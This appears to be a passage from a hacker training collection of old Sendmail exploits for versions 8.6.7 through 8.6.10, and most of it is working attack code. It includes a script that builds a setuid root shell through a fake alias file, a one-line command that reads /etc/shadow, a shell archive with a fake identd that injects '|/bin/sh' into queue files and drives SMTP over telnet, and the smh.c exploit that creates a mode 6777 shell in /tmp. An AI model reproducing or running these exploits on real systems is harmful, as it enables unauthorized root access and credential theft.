sendmail2.txt

黑客培训教程

# since solaris sh and csh and tcsh refuse to run when euid != realuid,

# we instead run the program we compiled above.

/bin/chmod 6777 $TEMPDIR/setid0

/bin/chown root $TEMPDIR/setid0

/bin/sync

" > alias.sh

chmod 755 alias.sh

echo "Creating fake alias file..."

echo "yash: |$TEMPDIR/alias.sh" > aliases

echo "Faking alias pointer in new config file..."

egrep -v '(OA|DZ|Ou|Og)' $CONFIG > /tmp/sm.cf

echo "

# hacks follow

OA/$TEMPDIR/aliases                     # our fake alias file

Ou0                                     # user ID to run as

Og0                                     # group ID to run as

DZWHOOP-v1.0" >> /tmp/sm.cf

echo "Creating the sendmail script..."

cat > sendmail.script << _EOF_

helo

mail from: <nobody>

rcpt to: <yash>

data

yet another sendmail hole?  suid whoop?

\.                                      # oops.. delete \ prior to execution

quit

_EOF_

echo "Executing $SENDMAIL $DEBUGFLAGS -bs..."

$SENDMAIL $DEBUGFLAGS -bs < sendmail.script

# give it time to execute.

sleep 4

# cleanup in 5 seconds

(sleep 5; rm -rf $TEMPDIR ; rm /tmp/sm.cf) &

if [ -u setid0 ]

then

 echo "setid0 is a suid shell.  executing..."

 cd /

 $TEMPDIR/setid0 /bin/csh

 echo "end of script."

 exit 0

else

 echo "setid0 is not suid; script failed."

 echo "apparently, you don't have the bug.  celebrate :-)"

 exit 1

fi

--------------------------------- CuT HeRe --------------------------------

-oE/filename bounce = 8.6.7 =

Version affected: 8.6.7

A bug in Sendmail 8.6.7 allows anyone to read any file, including the
shadowed password file:

/usr/lib/sendmail -oE/etc/shadow bounce
From: your_username

8.6.9 = 8.6.9 or earlier =

Mail any file to yourself.

------8<-------------------Cut Here--------------------8<-------------------

# This is a shell archive.  Save it in a file, remove anything before

# this line, and then unpack it by entering "sh file".  Note, it may

# create directories; files and directories will be owned by you and

# have default permissions.

#

# This archive contains:

#

#       description

#       sm869.local

#       sm869.remote

#

echo x - description

sed 's/^X//' >description << 'END-of-description'

X

XProgram: sm869.remote

X

Xyou can:

X

X   run the body of the mail through a shell if

X   sendmail is allowed to run a shell.

X

X   write the whole message to a file.

X

X   have it send back a file to an account you specify.

X

XThe last option is supposed to remove the file after sending

Xit but I found that it hasn't in my tests.  Why?  Well

Xit has multiple recipients, one of the recipients is a

Xrecipient that will never go through.  So the data file

Xgets kept around until it gives up on that host.  This

Xcan be several days.

X

XProblems:

X

X  The action you specify will happen every 30minutes (the

X  queue time, may be different) until it gives up sending

X  to the unreachable host.  (Actually this may be false.

X  I haven't left it around long enough to see if this happens.

X  Perhaps sendmail is smart enough to remove the other recipients

X  that did get delievered from the queue file).

X

X  If you send a file back to yourself it may get removed

X  several days later.  If you get the password file or

X  some other critical file you had better be ready to clean

X  up.

X

X  Lots of logs.  Its fairly obvious from the log files that

X  some hokey pokey is going on.  If you're sending a file

X  back to yourself then you're pointing a finger at one

X  of your accounts

X

XYou have to go into the program to change the options you

Xwant.  The code is fairly well commented so this shouldn't

Xbe any problem.

X

XProgram: sm869.local

X

XSame thing as above really except it works even if sendmail

Xdoesnt check identd and you dont have to specify an unreachable

Xhost.  The file goes straight to the queue.

X

END-of-description

echo x - sm869.local

sed 's/^X//' >sm869.local << 'END-of-sm869.local'

X#!/bin/sh

X#

X# Exploit hole in sendmail 8.6.9 and earlier.

X#

X

X# Either write a file or run a program.

X#ACTION="|/tmp/runme"

XACTION="/tmp/writeme"

X

X# Data file to read from and then remove

XDATAFILE="/tmp/abc"

X#DATAFILE=""

X

X# Who to run as

XRUNAS="bin"

X

X# Who to send mail to

XWHOAMI=`whoami`

XSENDTO=$WHOAMI

X#SENDTO="someone-else"

X

X# Build up arg and send it off

Xif [ -n "$DATAFILE" ] ; then

XARG="$WHOAMI

XD$DATAFILE

XC:$RUNAS

XR\"$ACTION\""

Xelse

XARG="$WHOAMI

XC:$RUNAS

XR\"$ACTION\""

Xfi

Xsendmail -odq -F"$ARG" $SENDTO << _END_

XThis is appearing in the mailbox

Xand also being piped to the program or

Xwritten to the file, UNLESS you specify

Xa datafile above.  In that case the datafile

Xwill be written and erased and this text will

Xbe left (not deleted) in the queue directory.

X_END_

X

END-of-sm869.local

echo x - sm869.remote

sed 's/^X//' >sm869.remote << 'END-of-sm869.remote'

X#!/bin/sh

X#

X# exploit for sm869 or worse

X# identd must not be enabled (port 113 must be free)

X

X# this must be a host that mail can go to (MX not pointing elsewhere)

X# that we cant reach right now (ie. host doesnt exist anymore)

XUNREACHABLE="goofy.uhcc.hawaii.edu"

X

X# Commands to run on remote host

XCOMMANDS="touch /tmp/gotcha"

X

X# what host to run it on

XTARGET="localhost"

X

X# work in a temp dir

XTD=/tmp/.Xwork.$$

Xmkdir $TD

Xcd $TD

X

Xcat > a.c <<_END_

X#include <sys/types.h>

X#include <sys/socket.h>

X#include <netinet/in.h>

X

X/* run body of mail through shell run as daemon */

X#define REPLY "USERID : UNIX : a\nC:daemon\nR\"|sed

'1,/^$/d'|/bin/sh\"\nHXxx:

"

X

X#ifdef other_possibilities

X/* write to a file as daemon */

X#define REPLY "USERID : UNIX : a\nC:daemon\nR/tmp/writeme\nHXxx: "

X/* send back a file to someone and erase it */

X#define REPLY "USERID : UNIX :

a\nD/tmp/sendtome\nRmy@address.here\nHXxx: "

X#endif

X

Xreadline(fd, buf, len)

Xchar *buf;

X{

X    int i = 0;

X

X    while(i < len && read(fd, &buf[i], 1) == 1 && buf[i]) {

X       if(buf[i] == '\r' || buf[i] == '\n')

X           break;

X       i++;

X    }

X    buf[i] = '\0';

X}

X

Xdie(str)

Xchar *str;

X{

X    perror(str); exit(1);

X}

X

Xmain()

X{

X    int s, s2, adlen;

X    struct sockaddr_in ad;

X    char buf[60];

X

X    ad.sin_family = AF_INET;

X    ad.sin_port = htons(113);

X    ad.sin_addr.s_addr = INADDR_ANY;

X    if((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) die("socket");

X    if(bind(s, (struct sockaddr *)&ad, sizeof(ad)) == -1) die("bind");

X    if(listen(s, 1) == -1) die("listen");

X    adlen = sizeof(ad);

X    s2 = accept(s, (struct sockaddr *)&ad, &adlen);

X    if(s2 == -1) die("accept");

X    printf("Connection from %s port %d\n",

X        inet_ntoa(ad.sin_addr), ntohs(ad.sin_port));

X    readline(s2, buf, 50);

X    sprintf(buf + strlen(buf), " : %s\n", REPLY);

X    write(s2, buf, strlen(buf));

X}

X_END_

X

X# compile program

Xecho "compiling"

Xcc a.c -o ident

Xecho "running fake ident"

X./ident &

X

X# send to reomte

Xecho "talking to remote"

X(

X  sleep 1; echo "helo"

X  sleep 1; echo "mail from: "

X  sleep 1; echo "rcpt to: "

X  sleep 1; echo "data"

X  echo "$COMMANDS"

X  echo "."

X  sleep 1; echo "quit"

X  sleep 5

X) | telnet $TARGET 25

X

X# cleanup

Xcd /

Xrm -rf $TD

Xecho "done."

X

END-of-sm869.remote

exit

.................................. CuT HeRe ..................................

8.6.9 newlines = 8.6.9 =

When a message is queued for delivery by sendmail, a pair of files are
written to the spool directory (/var/spool/mqueue on many systems). One of
these files (qf<something>) contains information related to the processing
of the message (headers, sender, recipient, etc.). Taking versions of
sendmail prior to 8.6.10 as an example, one of the pieces of information
maintained in this file is the name of the controlling user if mail is
being delivered to a script (or file). By feeding sendmail a recipient
address that contains newlines, it is possible to add lines to the queue
file which specify a controlling user and an executable to run with that
users access level. The 8.6.10 patch removes this hole, by stripping
newlines from the recipient address before writing the queue file.

EXPLOIT:

/* smh.c - Michael R. Widner - atreus (2/27/95)

 *

 * a quick hack to abuse sendmail 8.6.9 or whatever else is subject to this

 * hole.  It's really just a matter of passing newlines in arguments to

 * sendmail and getting the stuff into the queue files.  If we run this

 * locally with -odq we are guaranteed that it will be queue, rather than

 * processed immediately.  Wait for the queue to get processed automatically

 * or just run sendmail -q if you're impatient.

 * usage: smh [ username [/path/to/sendmail]]

 * It's worth noting that this is generally only good for getting bin.

 * sendmail still wants to process the sendmail.cf file, which contains

 * Ou1 and Og1 most of the time, limiting you to bin access.  Is there

 * a way around this?

 * cc -o smh smh.c should do the trick.  This just creates a bin owned

 * mode 6777 copy of /bin/sh in /tmp called /tmp/newsh.  Note that on some

 * systems this is pretty much worthless, but you're smart enough to know

 * which systems those are.  Aren't you?

 */

#include <sys/types.h>

#include <unistd.h>

#include <stdlib.h>

main(argc, argv)

int argc;

char **argv;

{

        execlp(argv[2] ? argv[2] : "sendmail","sendmail","-odq","-p",

        "ascii\nCroot\nMprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u\nMlocal,

P=/bin/sh, F=lsDFMeu,

A=sh -c $u\nR<\"|/bin/cp /bin/sh /tmp/newsh\">\nR<\"|/bin/chmod 6777

/tmp/newsh\">\n$rascii ",

        argv[1] ? argv[1] : "atreus",0);

}

................................ CuT HeRe ..................................

8.6.10 ident/newlines = 8.6.10 =

This is a sendmail 8.6.10 attack based on the problems that sendmail 8.6.10
inherited from sendmail 8.6.9 .... Look at comments in the source. Two
exploits follow:

/* 8.6.10 sendmail attacker

 *